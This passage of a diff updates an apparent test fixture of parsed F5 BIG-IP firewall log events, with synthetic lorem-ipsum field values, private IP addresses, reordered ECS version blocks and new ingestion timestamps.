"2021-06-09T10:31:51.965303300Z" + "ingested": "2021-12-14T14:42:50.150085810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dat periam dqu6144.api.localhost dutpers erun orisn [F5@reetd acl_policy_name=prehen acl_policy_type=ntutlabo acl_rule_name=iusmodte action=Established hostname=loi7596.www5.home bigip_mgmt_ip=10.31.177.226 context_name=deserun context_type=esseq date_time=Dec 23 2016 00:09:07 dest_ip=10.209.157.8 dst_geo=giatquov dest_port=1918 device_product=enderi device_vendor=ptatem device_version=1.341 drop_reason=fugi errdefs_msgno=labo errdefs_msg_name=nostrud flow_id=gnaal ip_protocol=ggp severity=medium partition_name=cupi route_domain=tame sa_translation_pool=atione sa_translation_type=lores source_ip=10.45.253.103 src_geo=uii source_port=5923 source_user=remagn translated_dest_ip=10.47.255.237 translated_dest_port=2311 translated_ip_protocol=uuntur translated_route_domain=enderit translated_source_ip=10.107.45.175 translated_source_port=4185 translated_vlan=rumSecti vlan=4593", "event": { - "ingested": "2021-06-09T10:31:51.965309100Z" + "ingested": "2021-12-14T14:42:50.150086308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atise tate onevo4326.internal.local isnost olorem ido [F5@emqu acl_policy_name=riss acl_policy_type=iquamqua acl_rule_name=sit action=Reject hostname=nsequat1971.internal.invalid bigip_mgmt_ip=10.225.212.189 context_name=mven context_type=olorsit date_time=Jan 06 2017 07:11:41 dest_ip=10.121.239.183 dst_geo=illu dest_port=4875 device_product=turadip device_vendor=tatevel device_version=1.1607 drop_reason=ptassita errdefs_msgno=its errdefs_msg_name=lore flow_id=idol ip_protocol=igmp severity=high partition_name=isn route_domain=sBono sa_translation_pool=loremqu sa_translation_type=tetur source_ip=10.213.94.135 src_geo=tMal source_port=2607 source_user=dquia translated_dest_ip=10.55.105.113 translated_dest_port=3214 translated_ip_protocol=tatione translated_route_domain=nimveni translated_source_ip=10.44.58.106 translated_source_port=1241 translated_vlan=quid vlan=4814", "event": { - "ingested": "2021-06-09T10:31:51.965314600Z" + "ingested": "2021-12-14T14:42:50.150086714Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eporroq ulla iqu4614.www5.example abore squ uiadol [F5@Duisa acl_policy_name=lupta acl_policy_type=aUt acl_rule_name=boNem action=Reject hostname=ectiono2241.lan bigip_mgmt_ip=10.2.114.9 context_name=rehende context_type=velillu date_time=Jan 20 2017 14:14:16 dest_ip=10.94.139.127 dst_geo=mUten dest_port=1812 device_product=quidolor device_vendor=oqu device_version=1.51 drop_reason=tlaboree errdefs_msgno=norumet errdefs_msg_name=dtempo flow_id=tin ip_protocol=tcp severity=high partition_name=imad route_domain=tinvolup sa_translation_pool=tsed sa_translation_type=inv source_ip=10.163.209.70 src_geo=atu source_port=4718 source_user=olabor translated_dest_ip=10.69.161.78 translated_dest_port=1282 translated_ip_protocol=iruredol translated_route_domain=incidid translated_source_ip=10.255.74.136 translated_source_port=5902 translated_vlan=eaqueips vlan=6396", "event": { - "ingested": "2021-06-09T10:31:51.965319700Z" + "ingested": "2021-12-14T14:42:50.150087122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "volupta dmi untexpl2847.www5.local eiusmod emoe uiinea [F5@mnisiut acl_policy_name=avolu acl_policy_type=Except acl_rule_name=olup action=Closed hostname=umetMal1664.mail.lan bigip_mgmt_ip=10.46.115.216 context_name=equun context_type=sitvo date_time=Feb 03 2017 21:16:50 dest_ip=10.223.198.146 dst_geo=iciad dest_port=7874 device_product=mad device_vendor=onse device_version=1.380 drop_reason=mipsum errdefs_msgno=lmo errdefs_msg_name=aliquamq flow_id=dtempori ip_protocol=rdp severity=medium partition_name=voluptat route_domain=ugit sa_translation_pool=tatem sa_translation_type=metcons source_ip=10.252.102.110 src_geo=henderit source_port=7829 source_user=perspici translated_dest_ip=10.184.59.148 translated_dest_port=6933 translated_ip_protocol=queips translated_route_domain=midest translated_source_ip=10.12.129.137 translated_source_port=721 translated_vlan=orroqu vlan=472", "event": { - "ingested": "2021-06-09T10:31:51.965325200Z" + "ingested": "2021-12-14T14:42:50.150087511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "labore uela ntexplic4824.internal.localhost dolorsit archite remq [F5@veniamq acl_policy_name=occ acl_policy_type=oloreseo acl_rule_name=iruredol action=Established hostname=derit5270.mail.local bigip_mgmt_ip=10.105.52.140 context_name=ntexpl context_type=dunt date_time=Feb 18 2017 04:19:24 dest_ip=10.20.55.199 dst_geo=nder dest_port=3238 device_product=itanim device_vendor=nesciun device_version=1.1729 drop_reason=mollita errdefs_msgno=tatem errdefs_msg_name=iae flow_id=quido ip_protocol=ipv6-icmp severity=very-high partition_name=inBC route_domain=mol sa_translation_pool=tur sa_translation_type=ictas source_ip=10.81.184.7 src_geo=saquaea source_port=6344 source_user=eetd translated_dest_ip=10.155.204.243 translated_dest_port=459 translated_ip_protocol=lorsi translated_route_domain=repreh translated_source_ip=10.199.194.79 translated_source_port=7713 translated_vlan=illumqui vlan=3414", "event": { - "ingested": "2021-06-09T10:31:51.965330900Z" + "ingested": "2021-12-14T14:42:50.150087914Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amali ate idolor3916.www5.home tas autfugi tasun [F5@duntutla acl_policy_name=ntium acl_policy_type=iration acl_rule_name=umwritte action=Closed hostname=orisni5238.mail.lan bigip_mgmt_ip=10.177.238.45 context_name=iumt context_type=tsed date_time=Mar 04 2017 11:21:59 dest_ip=10.249.120.78 dst_geo=unte dest_port=893 device_product=ueipsa device_vendor=scipitl device_version=1.1453 drop_reason=aparia errdefs_msgno=tatnon errdefs_msg_name=leumiur flow_id=tetura ip_protocol=ggp severity=very-high partition_name=oluptat route_domain=metco sa_translation_pool=acom sa_translation_type=ceroinB source_ip=10.110.2.166 src_geo=exeacomm source_port=79 source_user=taliqui translated_dest_ip=10.18.226.72 translated_dest_port=5140 translated_ip_protocol=olupta translated_route_domain=tsuntinc translated_source_ip=10.251.231.142 translated_source_port=872 translated_vlan=urExcep vlan=102", "event": { - "ingested": "2021-06-09T10:31:51.965336Z" + "ingested": "2021-12-14T14:42:50.150088314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "suntex iacons occaec7487.corp quaeab fici imve [F5@quide acl_policy_name=quaU acl_policy_type=undeomni acl_rule_name=accusa action=Established hostname=iutali7297.www.domain bigip_mgmt_ip=10.190.122.27 context_name=mporainc context_type=xea date_time=Mar 18 2017 18:24:33 dest_ip=10.123.113.152 dst_geo=billo dest_port=2618 device_product=radipisc device_vendor=Cice device_version=1.6332 drop_reason=vitaed errdefs_msgno=ser errdefs_msg_name=etconsec flow_id=elillum ip_protocol=tcp severity=high partition_name=rnat route_domain=eprehend sa_translation_pool=rem sa_translation_type=edolo source_ip=10.99.202.229 src_geo=eosquira source_port=4392 source_user=lloinven translated_dest_ip=10.100.199.226 translated_dest_port=7617 translated_ip_protocol=apariatu translated_route_domain=lorsita translated_source_ip=10.192.98.247 translated_source_port=4308 translated_vlan=temaccu vlan=5302", "event": { - "ingested": "2021-06-09T10:31:51.965341Z" + "ingested": "2021-12-14T14:42:50.150088728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uptassit ncidi tlabori4803.www5.local oconse mag tob [F5@dolores acl_policy_name=equamnih acl_policy_type=taliqui acl_rule_name=eiu action=Drop hostname=orumw5960.www5.home bigip_mgmt_ip=10.248.111.207 context_name=dolor context_type=tiumto date_time=Apr 02 2017 01:27:07 dest_ip=10.38.28.151 dst_geo=nrepreh dest_port=5251 device_product=equep device_vendor=ever device_version=1.6463 drop_reason=atq errdefs_msgno=erspi errdefs_msg_name=iqu flow_id=niamqu ip_protocol=rdp severity=medium partition_name=icab route_domain=sBonor sa_translation_pool=fugits sa_translation_type=mipsumqu source_ip=10.172.154.97 src_geo=admi source_port=7165 source_user=culpaq translated_dest_ip=10.162.97.197 translated_dest_port=4357 translated_ip_protocol=tcupida translated_route_domain=isa translated_source_ip=10.37.193.70 translated_source_port=170 translated_vlan=tesseq vlan=7693", "event": { - "ingested": "2021-06-09T10:31:51.965346600Z" + "ingested": "2021-12-14T14:42:50.150089139Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pernat rerepre nculpaq3821.www5.invalid billoinv sci col [F5@obea acl_policy_name=emp acl_policy_type=agnaaliq acl_rule_name=est action=Reject hostname=oinv5493.internal.domain bigip_mgmt_ip=10.36.63.31 context_name=nisiu context_type=imad date_time=Apr 16 2017 08:29:41 dest_ip=10.30.101.79 dst_geo=itasp dest_port=4927 device_product=sitametc device_vendor=onsequa device_version=1.3912 drop_reason=ntmo errdefs_msgno=loreeu errdefs_msg_name=temse flow_id=aspernat ip_protocol=ipv6 severity=very-high partition_name=caecat route_domain=rautod sa_translation_pool=olest sa_translation_type=eataev source_ip=10.171.221.230 src_geo=edquia source_port=1977 source_user=otamr translated_dest_ip=10.222.165.250 translated_dest_port=2757 translated_ip_protocol=amvolu translated_route_domain=mip translated_source_ip=10.45.35.180 translated_source_port=653 translated_vlan=maccusa vlan=7248", "event": { - "ingested": "2021-06-09T10:31:51.965351700Z" + "ingested": "2021-12-14T14:42:50.150089524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimad ataevita oremqu542.internal.localhost uteir boree isn [F5@ulla acl_policy_name=equatDu acl_policy_type=pta acl_rule_name=enbyCi action=Reject hostname=tnonproi195.api.home bigip_mgmt_ip=10.238.4.219 context_name=uide context_type=scivel date_time=Apr 30 2017 15:32:16 dest_ip=10.150.9.246 dst_geo=meumfugi dest_port=7010 device_product=emaperia device_vendor=Section device_version=1.4329 drop_reason=iame errdefs_msgno=orroquis errdefs_msg_name=aquio flow_id=riatu ip_protocol=udp severity=low partition_name=tanimid route_domain=isnostru sa_translation_pool=nofdeFi sa_translation_type=aquioff source_ip=10.1.171.61 src_geo=amnisi source_port=7258 source_user=reetdolo translated_dest_ip=10.199.127.211 translated_dest_port=3598 translated_ip_protocol=ilmole translated_route_domain=ugi translated_source_ip=10.83.238.145 translated_source_port=5392 translated_vlan=emveleum vlan=3661", "event": { - "ingested": "2021-06-09T10:31:51.965356400Z" + "ingested": "2021-12-14T14:42:50.150089969Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nde abillo undeom845.www5.example quaer eetdo tlab [F5@spernatu acl_policy_name=exercita acl_policy_type=sBonorum acl_rule_name=atems action=Drop hostname=edictasu5362.internal.localhost bigip_mgmt_ip=10.65.141.244 context_name=turmag context_type=ipsaqu date_time=May 14 2017 22:34:50 dest_ip=10.203.69.36 dst_geo=quira dest_port=3091 device_product=ore device_vendor=tation device_version=1.3789 drop_reason=porincid errdefs_msgno=tperspic errdefs_msg_name=equu flow_id=sintoc ip_protocol=rdp severity=very-high partition_name=tetura route_domain=riosamni sa_translation_pool=icta sa_translation_type=luptate source_ip=10.170.252.219 src_geo=iqui source_port=1978 source_user=Nequepo translated_dest_ip=10.44.226.104 translated_dest_port=7020 translated_ip_protocol=nse translated_route_domain=veniam translated_source_ip=10.74.213.42 translated_source_port=5922 translated_vlan=sse vlan=2498", "event": { - "ingested": "2021-06-09T10:31:51.965363700Z" + "ingested": "2021-12-14T14:42:50.150090395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inBCSe otamrem tutlabor4180.internal.host consecte pteurs catcupi [F5@autf acl_policy_name=saqu acl_policy_type=uptat acl_rule_name=unt action=Reject hostname=uido492.www5.home bigip_mgmt_ip=10.180.48.221 context_name=lors context_type=aconsequ date_time=May 29 2017 05:37:24 dest_ip=10.33.195.166 dst_geo=sequat dest_port=4596 device_product=utemvel device_vendor=epteur device_version=1.2965 drop_reason=iusm errdefs_msgno=roi errdefs_msg_name=busBonor flow_id=stquido ip_protocol=igmp severity=high partition_name=mnisi route_domain=usmo sa_translation_pool=iamea sa_translation_type=imaveni source_ip=10.183.223.149 src_geo=cor source_port=2648 source_user=nihil translated_dest_ip=10.225.255.211 translated_dest_port=5595 translated_ip_protocol=citati translated_route_domain=uamei translated_source_ip=10.225.141.172 translated_source_port=956 translated_vlan=fugiatn vlan=3309", "event": { - "ingested": "2021-06-09T10:31:51.965368800Z" + "ingested": "2021-12-14T14:42:50.150090912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aaliq nat uovolupt307.internal.host serror onse umquam [F5@emagn acl_policy_name=emulla acl_policy_type=mips acl_rule_name=itae action=Established hostname=redo6311.api.invalid bigip_mgmt_ip=10.176.64.28 context_name=olup context_type=remipsu date_time=Jun 12 2017 12:39:58 dest_ip=10.92.6.176 dst_geo=mcorpor dest_port=7420 device_product=autfugit device_vendor=emUte device_version=1.7612 drop_reason=nturmag errdefs_msgno=tura errdefs_msg_name=osquirat flow_id=equat ip_protocol=tcp severity=high partition_name=usantiu route_domain=idunt sa_translation_pool=atqu sa_translation_type=naturau source_ip=10.97.138.181 src_geo=oluptat source_port=7128 source_user=eseruntm translated_dest_ip=10.205.174.181 translated_dest_port=766 translated_ip_protocol=olor translated_route_domain=etquasia translated_source_ip=10.169.123.103 translated_source_port=519 translated_vlan=uisa vlan=6863", "event": { - "ingested": "2021-06-09T10:31:51.965373500Z" + "ingested": "2021-12-14T14:42:50.150091303Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Cicero evolupta teturadi4718.api.local piscivel hend eacommo [F5@ueip acl_policy_name=maliqu acl_policy_type=iati acl_rule_name=minim action=Established hostname=dolorem1698.www.domain bigip_mgmt_ip=10.75.120.11 context_name=urau context_type=etur date_time=Jun 26 2017 19:42:33 dest_ip=10.20.73.247 dst_geo=laborum dest_port=5749 device_product=xeac device_vendor=umdolors device_version=1.4226 drop_reason=uiadolo errdefs_msgno=empor errdefs_msg_name=umexerci flow_id=duntut ip_protocol=ggp severity=very-high partition_name=prehend route_domain=eufug sa_translation_pool=roquisq sa_translation_type=temporai source_ip=10.53.101.131 src_geo=ici source_port=5097 source_user=tquo translated_dest_ip=10.204.4.40 translated_dest_port=271 translated_ip_protocol=sitvo translated_route_domain=ine translated_source_ip=10.169.101.161 translated_source_port=4577 translated_vlan=ipi vlan=4211", "event": { - "ingested": "2021-06-09T10:31:51.965378400Z" + "ingested": "2021-12-14T14:42:50.150091806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "exerci idata ese4384.mail.domain rumexerc isiutali iquidexe [F5@illumq acl_policy_name=luptatem acl_policy_type=ite acl_rule_name=tasnul action=Reject hostname=evitae7333.www.lan bigip_mgmt_ip=10.28.51.219 context_name=ess context_type=quiad date_time=Jul 11 2017 02:45:07 dest_ip=10.43.210.236 dst_geo=litanim dest_port=2135 device_product=orsitam device_vendor=modico device_version=1.2990 drop_reason=itatio errdefs_msgno=porinc errdefs_msg_name=riame flow_id=riat ip_protocol=udp severity=very-high partition_name=eriam route_domain=pernat sa_translation_pool=udan sa_translation_type=archi source_ip=10.6.222.112 src_geo=aliqu source_port=780 source_user=onsequu translated_dest_ip=10.156.117.169 translated_dest_port=2939 translated_ip_protocol=agnamal translated_route_domain=quei translated_source_ip=10.87.120.87 translated_source_port=1636 translated_vlan=teni vlan=4967", "event": { - "ingested": "2021-06-09T10:31:51.965383Z" + "ingested": "2021-12-14T14:42:50.150092332Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dant etdolor uat7787.www.host iti nimadm nculp [F5@asp acl_policy_name=eacom acl_policy_type=mag acl_rule_name=gelitse action=Drop hostname=arc2412.mail.lan bigip_mgmt_ip=10.247.44.59 context_name=eiusmo context_type=ainc date_time=Jul 25 2017 09:47:41 dest_ip=10.173.129.72 dst_geo=ecill dest_port=6831 device_product=snu device_vendor=inibusB device_version=1.388 drop_reason=texplica errdefs_msgno=oco errdefs_msg_name=aboree flow_id=ainci ip_protocol=udp severity=high partition_name=pariatur route_domain=uames sa_translation_pool=umtotamr sa_translation_type=mquido source_ip=10.57.89.155 src_geo=rur source_port=3553 source_user=ntorever translated_dest_ip=10.253.167.17 translated_dest_port=2990 translated_ip_protocol=seos translated_route_domain=exercita translated_source_ip=10.4.126.103 translated_source_port=892 translated_vlan=tco vlan=3607", "event": { - "ingested": "2021-06-09T10:31:51.965387600Z" + "ingested": "2021-12-14T14:42:50.150092762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oluptate lit santi837.api.domain turadip dip idolo [F5@Ute acl_policy_name=ptassita acl_policy_type=caecatcu acl_rule_name=inBC action=Established hostname=olorsi2746.internal.localhost bigip_mgmt_ip=10.15.240.220 context_name=teir context_type=quep date_time=Aug 08 2017 16:50:15 dest_ip=10.63.78.66 dst_geo=xeac dest_port=7061 device_product=abor device_vendor=oreverit device_version=1.6451 drop_reason=reetdo errdefs_msgno=tat errdefs_msg_name=eufugia flow_id=ncididun ip_protocol=tcp severity=medium partition_name=periamea route_domain=itametco sa_translation_pool=vel sa_translation_type=quunt source_ip=10.248.206.210 src_geo=nonn source_port=4478 source_user=met translated_dest_ip=10.36.69.125 translated_dest_port=7157 translated_ip_protocol=entsu translated_route_domain=conse translated_source_ip=10.143.183.208 translated_source_port=5214 translated_vlan=umwri vlan=4057", "event": { - "ingested": "2021-06-09T10:31:51.965392600Z" + "ingested": "2021-12-14T14:42:50.150093161Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atura tur tur5914.internal.invalid tassita colabori imidestl [F5@piscing acl_policy_name=ceroi acl_policy_type=iconsequ acl_rule_name=iat action=Established hostname=edqu2208.www.localhost bigip_mgmt_ip=10.6.32.7 context_name=exerci context_type=inesciu date_time=Aug 22 2017 23:52:50 dest_ip=10.141.216.14 dst_geo=emu dest_port=5311 device_product=psa device_vendor=ate device_version=1.4386 drop_reason=fugitse errdefs_msgno=minimve errdefs_msg_name=serrorsi flow_id=tametco ip_protocol=ipv6-icmp severity=high partition_name=lore route_domain=isci sa_translation_pool=Dui sa_translation_type=reetdo source_ip=10.69.170.107 src_geo=iumtotam source_port=1010 source_user=ipitlabo translated_dest_ip=10.34.133.2 translated_dest_port=4807 translated_ip_protocol=nderi translated_route_domain=liqua translated_source_ip=10.142.186.43 translated_source_port=4691 translated_vlan=sautei vlan=2363", "event": { - "ingested": "2021-06-09T10:31:51.965397600Z" + "ingested": "2021-12-14T14:42:50.150093547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "voluptas velill rspic5453.www.local meum borumSec aecatcup [F5@snisiut acl_policy_name=siar acl_policy_type=quas acl_rule_name=occaeca action=Closed hostname=ender5647.www5.example bigip_mgmt_ip=10.142.22.24 context_name=ulamc context_type=cept date_time=Sep 06 2017 06:55:24 dest_ip=10.93.88.228 dst_geo=rchitect dest_port=3402 device_product=gna device_vendor=ici device_version=1.2026 drop_reason=olu errdefs_msgno=iameaque errdefs_msg_name=identsun flow_id=ender ip_protocol=ipv6 severity=low partition_name=tect route_domain=uiad sa_translation_pool=doconse sa_translation_type=eni source_ip=10.121.153.197 src_geo=smoditem source_port=6593 source_user=borumSec translated_dest_ip=10.59.103.10 translated_dest_port=768 translated_ip_protocol=oquisq translated_route_domain=abori translated_source_ip=10.170.165.164 translated_source_port=505 translated_vlan=uiineavo vlan=5554", "event": { - "ingested": "2021-06-09T10:31:51.965402400Z" + "ingested": "2021-12-14T14:42:50.150093941Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uidexeac sequa ntsunti2313.internal.invalid uinesc cid emi [F5@Bonorum acl_policy_name=lesti acl_policy_type=oreseo acl_rule_name=reprehen action=Established hostname=sis3986.internal.lan bigip_mgmt_ip=10.133.10.122 context_name=texplic context_type=edutp date_time=Sep 20 2017 13:57:58 dest_ip=10.93.59.189 dst_geo=eserun dest_port=3034 device_product=eniamqu device_vendor=inimav device_version=1.1576 drop_reason=imadm errdefs_msgno=uta errdefs_msg_name=tisu flow_id=remagnam ip_protocol=icmp severity=low partition_name=meiusm route_domain=nidolo sa_translation_pool=atquovol sa_translation_type=quunt source_ip=10.247.114.30 src_geo=olesti source_port=7584 source_user=quaeabil translated_dest_ip=10.19.99.129 translated_dest_port=956 translated_ip_protocol=itesse translated_route_domain=iamqui translated_source_ip=10.176.83.7 translated_source_port=5908 translated_vlan=inim vlan=6806", "event": { - "ingested": "2021-06-09T10:31:51.965407600Z" + "ingested": "2021-12-14T14:42:50.150094324Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Sed oremeumf lesti5921.api.localhost enima tnulapar ico [F5@giatquo acl_policy_name=lors acl_policy_type=its acl_rule_name=dolor action=Drop hostname=uatu2894.api.lan bigip_mgmt_ip=10.64.139.17 context_name=pro context_type=ice date_time=Oct 04 2017 21:00:32 dest_ip=10.87.238.169 dst_geo=conse dest_port=5351 device_product=mcol device_vendor=lup device_version=1.3824 drop_reason=upta errdefs_msgno=sedquian errdefs_msg_name=cti flow_id=rumSecti ip_protocol=rdp severity=medium partition_name=eca route_domain=oluptate sa_translation_pool=Duisa sa_translation_type=consequa source_ip=10.40.177.138 src_geo=aevitaed source_port=1082 source_user=rep translated_dest_ip=10.8.29.219 translated_dest_port=6890 translated_ip_protocol=quaeratv translated_route_domain=involu translated_source_ip=10.70.7.23 translated_source_port=2758 translated_vlan=amcolab vlan=4306", "event": { - "ingested": "2021-06-09T10:31:51.965412500Z" + "ingested": "2021-12-14T14:42:50.150094714Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "odic iuta liquaUte209.internal.test olores scipit lloinve [F5@borisnis acl_policy_name=onorumet acl_policy_type=ptatema acl_rule_name=eavolup action=Closed hostname=rmagnido5483.local bigip_mgmt_ip=10.180.62.222 context_name=ptatev context_type=atu date_time=Oct 19 2017 04:03:07 dest_ip=10.234.26.132 dst_geo=msequ dest_port=2383 device_product=mwritten device_vendor=tat device_version=1.6066 drop_reason=osa errdefs_msgno=mini errdefs_msg_name=rors flow_id=ssusci ip_protocol=udp severity=medium partition_name=inimve route_domain=uio sa_translation_pool=mexercit sa_translation_type=byC source_ip=10.2.189.20 src_geo=orin source_port=535 source_user=uptasnul translated_dest_ip=10.67.221.220 translated_dest_port=239 translated_ip_protocol=aedict translated_route_domain=niamqui translated_source_ip=10.67.173.228 translated_source_port=5767 translated_vlan=tatemse vlan=4493", "event": { - "ingested": "2021-06-09T10:31:51.965417100Z" + "ingested": "2021-12-14T14:42:50.150095106Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uamestqu mpor orem6479.api.host seq rumSe tatnonp [F5@ommo acl_policy_name=adeser acl_policy_type=uasiarc acl_rule_name=doeiu action=Reject hostname=uian521.www.example bigip_mgmt_ip=10.209.52.47 context_name=imven context_type=onnumqua date_time=Nov 02 2017 11:05:41 dest_ip=10.141.201.173 dst_geo=upt dest_port=6017 device_product=itautfu device_vendor=nesci device_version=1.5040 drop_reason=mquis errdefs_msgno=lorsi errdefs_msg_name=tetura flow_id=eeufug ip_protocol=ipv6 severity=medium partition_name=tevelite route_domain=tocca sa_translation_pool=orsitvol sa_translation_type=ntor source_ip=10.147.127.181 src_geo=minimav source_port=6994 source_user=tasu translated_dest_ip=10.56.134.118 translated_dest_port=358 translated_ip_protocol=evo translated_route_domain=mcorpori translated_source_ip=10.196.176.243 translated_source_port=3465 translated_vlan=orsitam vlan=4991", "event": { - "ingested": "2021-06-09T10:31:51.965421700Z" + "ingested": "2021-12-14T14:42:50.150095500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "prehende lup tpers2217.internal.lan nula tdolorem qui [F5@olupt acl_policy_name=nemulla acl_policy_type=asp acl_rule_name=dexercit action=Closed hostname=taliq5213.api.corp bigip_mgmt_ip=10.226.24.84 context_name=ectobea context_type=dat date_time=Nov 16 2017 18:08:15 dest_ip=10.91.18.221 dst_geo=aut dest_port=5596 device_product=uames device_vendor=tconsec device_version=1.7604 drop_reason=oll errdefs_msgno=laboree errdefs_msg_name=udantiu flow_id=itametco ip_protocol=ipv6 severity=very-high partition_name=odico route_domain=rsint sa_translation_pool=itl sa_translation_type=ttenb source_ip=10.231.18.90 src_geo=lapa source_port=4860 source_user=Nem translated_dest_ip=10.85.13.237 translated_dest_port=4072 translated_ip_protocol=upidata translated_route_domain=ici translated_source_ip=10.248.140.59 translated_source_port=5760 translated_vlan=ident vlan=4293", "event": { - "ingested": "2021-06-09T10:31:51.965426400Z" + "ingested": "2021-12-14T14:42:50.150095892Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quelaud luptat rinrep6482.api.lan nimv emeu tatemac [F5@quisn acl_policy_name=rem acl_policy_type=ulamcola acl_rule_name=remagnaa action=Accept hostname=ntsunt4894.mail.domain bigip_mgmt_ip=10.203.46.215 context_name=mcorpori context_type=orisn date_time=Dec 01 2017 01:10:49 dest_ip=10.88.194.242 dst_geo=mco dest_port=6246 device_product=itame device_vendor=tenat device_version=1.5407 drop_reason=yCiceroi errdefs_msgno=nostrum errdefs_msg_name=orroquis flow_id=eumi ip_protocol=icmp severity=low partition_name=aea route_domain=tvolu sa_translation_pool=dutper sa_translation_type=tlaboru source_ip=10.207.183.204 src_geo=equuntu source_port=2673 source_user=eruntmo translated_dest_ip=10.8.224.72 translated_dest_port=6506 translated_ip_protocol=ion translated_route_domain=rured translated_source_ip=10.59.215.207 translated_source_port=6195 translated_vlan=ore vlan=5842", "event": { - "ingested": "2021-06-09T10:31:51.965431200Z" + "ingested": "2021-12-14T14:42:50.150096371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xerc Nequep ametcon7485.www.test rro tuser ctasu [F5@irat acl_policy_name=sitame acl_policy_type=oinven acl_rule_name=natu action=Drop hostname=mexer3864.api.corp bigip_mgmt_ip=10.98.154.146 context_name=nula context_type=ameaquei date_time=Dec 15 2017 08:13:24 dest_ip=10.72.114.116 dst_geo=mquis dest_port=7760 device_product=olupta device_vendor=isno device_version=1.6814 drop_reason=ine errdefs_msgno=aeco errdefs_msg_name=rinrepr flow_id=dutp ip_protocol=ipv6-icmp severity=very-high partition_name=giatqu route_domain=rsint sa_translation_pool=rsi sa_translation_type=paq source_ip=10.73.84.95 src_geo=uisautem source_port=6701 source_user=sitam translated_dest_ip=10.255.145.22 translated_dest_port=6949 translated_ip_protocol=emUtenim translated_route_domain=ende translated_source_ip=10.230.38.148 translated_source_port=3213 translated_vlan=sse vlan=368", "event": { - "ingested": "2021-06-09T10:31:51.965435900Z" + "ingested": "2021-12-14T14:42:50.150096839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "incidi aedictas rumetMa2554.domain unt liq abore [F5@iumdo acl_policy_name=oreeu acl_policy_type=mea acl_rule_name=ssec action=Accept hostname=oluptat6960.www5.test bigip_mgmt_ip=10.211.29.187 context_name=ptat context_type=meaquei date_time=Dec 29 2017 15:15:58 dest_ip=10.228.204.249 dst_geo=eleumi dest_port=4584 device_product=porissus device_vendor=imip device_version=1.7160 drop_reason=ddoe errdefs_msgno=uptateve errdefs_msg_name=ured flow_id=ctetu ip_protocol=tcp severity=low partition_name=uasiarch route_domain=Malor sa_translation_pool=boriosa sa_translation_type=cillumdo source_ip=10.166.142.198 src_geo=oremipsu source_port=465 source_user=tium translated_dest_ip=10.105.120.162 translated_dest_port=2984 translated_ip_protocol=etc translated_route_domain=eturadip translated_source_ip=10.175.181.138 translated_source_port=3787 translated_vlan=tassitas vlan=1495", "event": { - "ingested": "2021-06-09T10:31:51.965440900Z" + "ingested": "2021-12-14T14:42:50.150097296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velite maccus nima5813.mail.example iarchit sBonorum moenimi [F5@lor acl_policy_name=auto acl_policy_type=rsinto acl_rule_name=ati action=Established hostname=fugiatnu2498.www.localhost 